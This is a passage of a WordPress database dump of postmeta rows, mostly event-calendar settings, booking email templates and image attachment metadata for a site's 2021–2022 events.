'mec_more_info',''),(148507,265832,'mec_repeat_type',''),(148508,265832,'mec_repeat_status','0'),(148509,265832,'mec_end_day_seconds','70200'),(148510,265832,'mec_end_time_ampm','PM'),(148511,265832,'mec_end_time_minutes','30'),(148512,265832,'mec_end_time_hour','7'),(148513,265832,'mec_end_date','2021-11-17'),(148514,265832,'mec_start_day_seconds','66600'),(148515,265832,'mec_start_time_ampm','PM'),(148516,265832,'mec_start_time_minutes','30'),(148517,265832,'mec_public','1'),(148518,265832,'mec_start_date','2021-11-17'),(148519,265832,'mec_start_time_hour','6'),(148520,265832,'mec_countdown_method','global'),(148521,265832,'mec_timezone','global'),(148522,265832,'mec_comment',''),(148523,265832,'one_occurrence','0'),(148524,265832,'mec_hide_time','0'),(148525,265832,'mec_hide_end_time','0'),(148526,265832,'mec_event_status','EventScheduled'),(148527,265832,'mec_fields','a:0:{}'),(148528,265832,'mec_op','a:0:{}'),(148529,265832,'mec_bfixed_fields','a:0:{}'),(148530,265832,'mec_reg_fields','a:0:{}'),(148531,265832,'mec_reg_fields_global_inheritance','1'),(148532,265832,'mec_ticket_variations','a:0:{}'),(148533,265832,'mec_ticket_variations_global_inheritance','1'),(148534,265832,'mec_fees','a:0:{}'),(148535,265832,'mec_booking','a:0:{}'),(148536,265832,'mec_tickets','a:0:{}'),(148537,265832,'mec_fees_global_inheritance','1'),(148538,265832,'mec_hourly_schedules','a:0:{}'),(148539,265832,'mec_not_in_days',''),(148540,265832,'mec_in_days',''),(148541,265832,'mec_repeat_end_at_date',''),(148542,265832,'mec_advanced_days','a:0:{}'),(148543,265832,'passster_protection_type','password'),(148544,265832,'passster_activate_global_protection',NULL),(148545,265832,'passster_activate_protection',NULL),(148546,265832,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148547,265832,'mec_repeat_end_at_occurrences',''),(148548,265832,'mec_repeat_end',''),(148549,265832,'mec_repeat_interval','1'),(148550,265832,'mec_allday','0'),(148551,265832,'mec_certain_weekdays','a:0:{}'),(148552,265832,'mec_dont_show_map','0'),(148553,265832,'mec_location_id','131'),(148554,265832,'mec_color',''),(148555,265832,'protect_children',''),(148556,265832,'_edit_lock','1635434545:2'),(148557,265832,'_edit_last','2'),(148558,265832,'_thumbnail_id','265833'),(148559,265833,'_wp_attached_file','2021/10/boy-mom-1.jpg'),(148560,265833,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:360;s:4:\"file\";s:21:\"2021/10/boy-mom-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-300x360.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"boy-mom-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(148561,265833,'original-file','2021/10/boy-mom-1-updraft-pre-smush-original.jpg'),(148562,265833,'smush-complete','1'),(148563,265833,'smush-info','The file was compressed from 76.18 KB to 72.07 KB saving 5.39 percent using WP-Optimize'),(148564,265833,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:78010;s:12:\"smushed-size\";i:73802;s:15:\"savings-percent\";d:5.38999999999999968025576890795491635799407958984375;}'),(148565,265835,'mec_moved_online_link',''),(148566,265835,'mec_cancelled_reason',''),(148567,265835,'mec_display_cancellation_reason_in_single_page',''),(148568,265835,'boldgrid_hide_page_title','0'),(148569,265835,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148570,265835,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-08\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148571,265835,'mec_currency','a:0:{}'),(148572,265835,'mec_additional_organizer_ids','a:0:{}'),(148573,265835,'mec_additional_location_ids','a:0:{}'),(148574,265835,'mec_cost',''),(148575,265835,'mec_more_info_target','_self'),(148576,265835,'mec_more_info_title',''),(148577,265835,'mec_organizer_id','1'),(148578,265835,'mec_read_more',''),(148579,265835,'mec_more_info',''),(148580,265835,'mec_repeat_type',''),(148581,265835,'mec_repeat_status','0'),(148582,265835,'mec_end_day_seconds','70200'),(148583,265835,'mec_end_time_ampm','PM'),(148584,265835,'mec_end_time_minutes','30'),(148585,265835,'mec_end_time_hour','7'),(148586,265835,'mec_end_date','2021-12-08'),(148587,265835,'mec_start_day_seconds','66600'),(148588,265835,'mec_start_time_ampm','PM'),(148589,265835,'mec_start_time_minutes','30'),(148590,265835,'mec_public','1'),(148591,265835,'mec_start_date','2021-12-08'),(148592,265835,'mec_start_time_hour','6'),(148593,265835,'mec_countdown_method','global'),(148594,265835,'mec_timezone','global'),(148595,265835,'mec_comment',''),(148596,265835,'one_occurrence','0'),(148597,265835,'mec_hide_time','0'),(148598,265835,'mec_hide_end_time','0'),(148599,265835,'mec_event_status','EventScheduled'),(148600,265835,'mec_fields','a:0:{}'),(148601,265835,'mec_op','a:0:{}'),(148602,265835,'mec_bfixed_fields','a:0:{}'),(148603,265835,'mec_reg_fields','a:0:{}'),(148604,265835,'mec_reg_fields_global_inheritance','1'),(148605,265835,'mec_ticket_variations','a:0:{}'),(148606,265835,'mec_ticket_variations_global_inheritance','1'),(148607,265835,'mec_fees','a:0:{}'),(148608,265835,'mec_booking','a:0:{}'),(148609,265835,'mec_tickets','a:0:{}'),(148610,265835,'mec_fees_global_inheritance','1'),(148611,265835,'mec_hourly_schedules','a:0:{}'),(148612,265835,'mec_not_in_days',''),(148613,265835,'mec_in_days',''),(148614,265835,'mec_repeat_end_at_date',''),(148615,265835,'mec_advanced_days','a:0:{}'),(148616,265835,'passster_protection_type','password'),(148617,265835,'passster_activate_global_protection',NULL),(148618,265835,'passster_activate_protection',NULL),(148619,265835,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148620,265835,'mec_repeat_end_at_occurrences',''),(148621,265835,'mec_repeat_end',''),(148622,265835,'mec_repeat_interval','1'),(148623,265835,'mec_allday','0'),(148624,265835,'mec_certain_weekdays','a:0:{}'),(148625,265835,'mec_dont_show_map','0'),(148626,265835,'mec_location_id','131'),(148627,265835,'mec_color',''),(148628,265835,'protect_children',''),(148629,265835,'_edit_lock','1635435556:2'),(148630,265835,'_edit_last','2'),(148631,265835,'_thumbnail_id','265838'),(148632,265836,'mec_moved_online_link',''),(148633,265836,'mec_cancelled_reason',''),(148634,265836,'mec_display_cancellation_reason_in_single_page',''),(148635,265836,'boldgrid_hide_page_title','0'),(148636,265836,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148637,265836,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148638,265836,'mec_currency','a:0:{}'),(148639,265836,'mec_additional_organizer_ids','a:0:{}'),(148640,265836,'mec_additional_location_ids','a:0:{}'),(148641,265836,'mec_cost',''),(148642,265836,'mec_more_info_target','_self'),(148643,265836,'mec_more_info_title',''),(148644,265836,'mec_organizer_id','1'),(148645,265836,'mec_read_more',''),(148646,265836,'mec_more_info',''),(148647,265836,'mec_repeat_type',''),(148648,265836,'mec_repeat_status','0'),(148649,265836,'mec_end_day_seconds','70200'),(148650,265836,'mec_end_time_ampm','PM'),(148651,265836,'mec_end_time_minutes','30'),(148652,265836,'mec_end_time_hour','7'),(148653,265836,'mec_end_date','2021-12-01'),(148654,265836,'mec_start_day_seconds','66600'),(148655,265836,'mec_start_time_ampm','PM'),(148656,265836,'mec_start_time_minutes','30'),(148657,265836,'mec_public','1'),(148658,265836,'mec_start_date','2021-12-01'),(148659,265836,'mec_start_time_hour','6'),(148660,265836,'mec_countdown_method','global'),(148661,265836,'mec_timezone','global'),(148662,265836,'mec_comment',''),(148663,265836,'one_occurrence','0'),(148664,265836,'mec_hide_time','0'),(148665,265836,'mec_hide_end_time','0'),(148666,265836,'mec_event_status','EventScheduled'),(148667,265836,'mec_fields','a:0:{}'),(148668,265836,'mec_op','a:0:{}'),(148669,265836,'mec_bfixed_fields','a:0:{}'),(148670,265836,'mec_reg_fields','a:0:{}'),(148671,265836,'mec_reg_fields_global_inheritance','1'),(148672,265836,'mec_ticket_variations','a:0:{}'),(148673,265836,'mec_ticket_variations_global_inheritance','1'),(148674,265836,'mec_fees','a:0:{}'),(148675,265836,'mec_booking','a:0:{}'),(148676,265836,'mec_tickets','a:0:{}'),(148677,265836,'mec_fees_global_inheritance','1'),(148678,265836,'mec_hourly_schedules','a:0:{}'),(148679,265836,'mec_not_in_days',''),(148680,265836,'mec_in_days',''),(148681,265836,'mec_repeat_end_at_date',''),(148682,265836,'mec_advanced_days','a:0:{}'),(148683,265836,'passster_protection_type','password'),(148684,265836,'passster_activate_global_protection',NULL),(148685,265836,'passster_activate_protection',NULL),(148686,265836,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148687,265836,'mec_repeat_end_at_occurrences',''),(148688,265836,'mec_repeat_end',''),(148689,265836,'mec_repeat_interval','1'),(148690,265836,'mec_allday','0'),(148691,265836,'mec_certain_weekdays','a:0:{}'),(148692,265836,'mec_dont_show_map','0'),(148693,265836,'mec_location_id','131'),(148694,265836,'mec_color',''),(148695,265836,'protect_children',''),(148696,265836,'_edit_lock','1635435914:2'),(148697,265836,'_edit_last','2'),(148698,265836,'_thumbnail_id','265679'),(148699,265838,'_wp_attached_file','2021/10/happy-jump-1.jpg'),(148700,265838,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:502;s:6:\"height\";i:282;s:4:\"file\";s:24:\"2021/10/happy-jump-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-300x282.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-474x282.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-300x282.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-jump-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(148701,265838,'original-file','2021/10/happy-jump-1-updraft-pre-smush-original.jpg'),(148702,265838,'smush-complete','1'),(148703,265838,'smush-info','The file was compressed from 49.84 KB to 47.35 KB saving 4.99 percent using WP-Optimize'),(148704,265838,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51035;s:12:\"smushed-size\";i:48488;s:15:\"savings-percent\";d:4.9900000000000002131628207280300557613372802734375;}'),(148705,265839,'mec_moved_online_link',''),(148706,265839,'mec_cancelled_reason',''),(148707,265839,'mec_display_cancellation_reason_in_single_page',''),(148708,265839,'boldgrid_hide_page_title','0'),(148709,265839,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148710,265839,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-15\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148711,265839,'mec_currency','a:0:{}'),(148712,265839,'mec_additional_organizer_ids','a:0:{}'),(148713,265839,'mec_additional_location_ids','a:0:{}'),(148714,265839,'mec_cost',''),(148715,265839,'mec_more_info_target','_self'),(148716,265839,'mec_more_info_title',''),(148717,265839,'mec_organizer_id','1'),(148718,265839,'mec_read_more',''),(148719,265839,'mec_more_info',''),(148720,265839,'mec_repeat_type',''),(148721,265839,'mec_repeat_status','0'),(148722,265839,'mec_end_day_seconds','70200'),(148723,265839,'mec_end_time_ampm','PM'),(148724,265839,'mec_end_time_minutes','30'),(148725,265839,'mec_end_time_hour','7'),(148726,265839,'mec_end_date','2021-12-15'),(148727,265839,'mec_start_day_seconds','66600'),(148728,265839,'mec_start_time_ampm','PM'),(148729,265839,'mec_start_time_minutes','30'),(148730,265839,'mec_public','1'),(148731,265839,'mec_start_date','2021-12-15'),(148732,265839,'mec_start_time_hour','6'),(148733,265839,'mec_countdown_method','global'),(148734,265839,'mec_timezone','global'),(148735,265839,'mec_comment',''),(148736,265839,'one_occurrence','0'),(148737,265839,'mec_hide_time','0'),(148738,265839,'mec_hide_end_time','0'),(148739,265839,'mec_event_status','EventScheduled'),(148740,265839,'mec_fields','a:0:{}'),(148741,265839,'mec_op','a:0:{}'),(148742,265839,'mec_bfixed_fields','a:0:{}'),(148743,265839,'mec_reg_fields','a:0:{}'),(148744,265839,'mec_reg_fields_global_inheritance','1'),(148745,265839,'mec_ticket_variations','a:0:{}'),(148746,265839,'mec_ticket_variations_global_inheritance','1'),(148747,265839,'mec_fees','a:0:{}'),(148748,265839,'mec_booking','a:0:{}'),(148749,265839,'mec_tickets','a:0:{}'),(148750,265839,'mec_fees_global_inheritance','1'),(148751,265839,'mec_hourly_schedules','a:0:{}'),(148752,265839,'mec_not_in_days',''),(148753,265839,'mec_in_days',''),(148754,265839,'mec_repeat_end_at_date',''),(148755,265839,'mec_advanced_days','a:0:{}'),(148756,265839,'passster_protection_type','password'),(148757,265839,'passster_activate_global_protection',NULL),(148758,265839,'passster_activate_protection',NULL),(148759,265839,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148760,265839,'mec_repeat_end_at_occurrences',''),(148761,265839,'mec_repeat_end',''),(148762,265839,'mec_repeat_interval','1'),(148763,265839,'mec_allday','0'),(148764,265839,'mec_certain_weekdays','a:0:{}'),(148765,265839,'mec_dont_show_map','0'),(148766,265839,'mec_location_id','131'),(148767,265839,'mec_color',''),(148768,265839,'protect_children',''),(148769,265839,'_edit_lock','1635436412:2'),(148770,265839,'_edit_last','2'),(148771,265839,'_thumbnail_id','265840'),(148772,265840,'_wp_attached_file','2021/10/forest-2.jpg'),(148773,265840,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:568;s:6:\"height\";i:320;s:4:\"file\";s:20:\"2021/10/forest-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"forest-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"forest-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:20:\"forest-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:20:\"forest-2-474x320.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:20:\"forest-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:20:\"forest-2-300x320.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"forest-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151187,266038,'_field_475','Allembe'),(151186,266038,'_field_474','Rebazar'),(169207,267186,'_edit_last','15'),(169206,267186,'_edit_lock','1662690297:15'),(169204,267186,'_thumbnail_id','266818'),(169205,267186,'_dp_original','266998'),(169202,267186,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(169201,267186,'boldgrid_in_page_containers','1'),(169200,267186,'_wp_old_date','2022-01-18'),(169199,267186,'passster_protection_type','password'),(169198,267186,'passster_activate_protection',NULL),(169197,267186,'passster_activate_global_protection',NULL),(159201,266531,'_field_137','RSVP for Beautify Day'),(151084,266026,'_field_447','Szollose'),(151083,266026,'_field_446','Brad'),(169079,267185,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-20\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-20\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152025,266103,'mec_location_id','118'),(152026,266103,'mec_dont_show_map','0'),(152027,266103,'mec_organizer_id','1'),(169081,267185,'mec_certain_weekdays','a:0:{}'),(169080,267185,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152024,266103,'mec_color',''),(152023,266103,'protect_children',''),(148861,265855,'_wp_attached_file','2021/10/happy-crowd-1.jpg'),(148862,265855,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:496;s:6:\"height\";i:279;s:4:\"file\";s:25:\"2021/10/happy-crowd-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"happy-crowd-1-474x279.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"i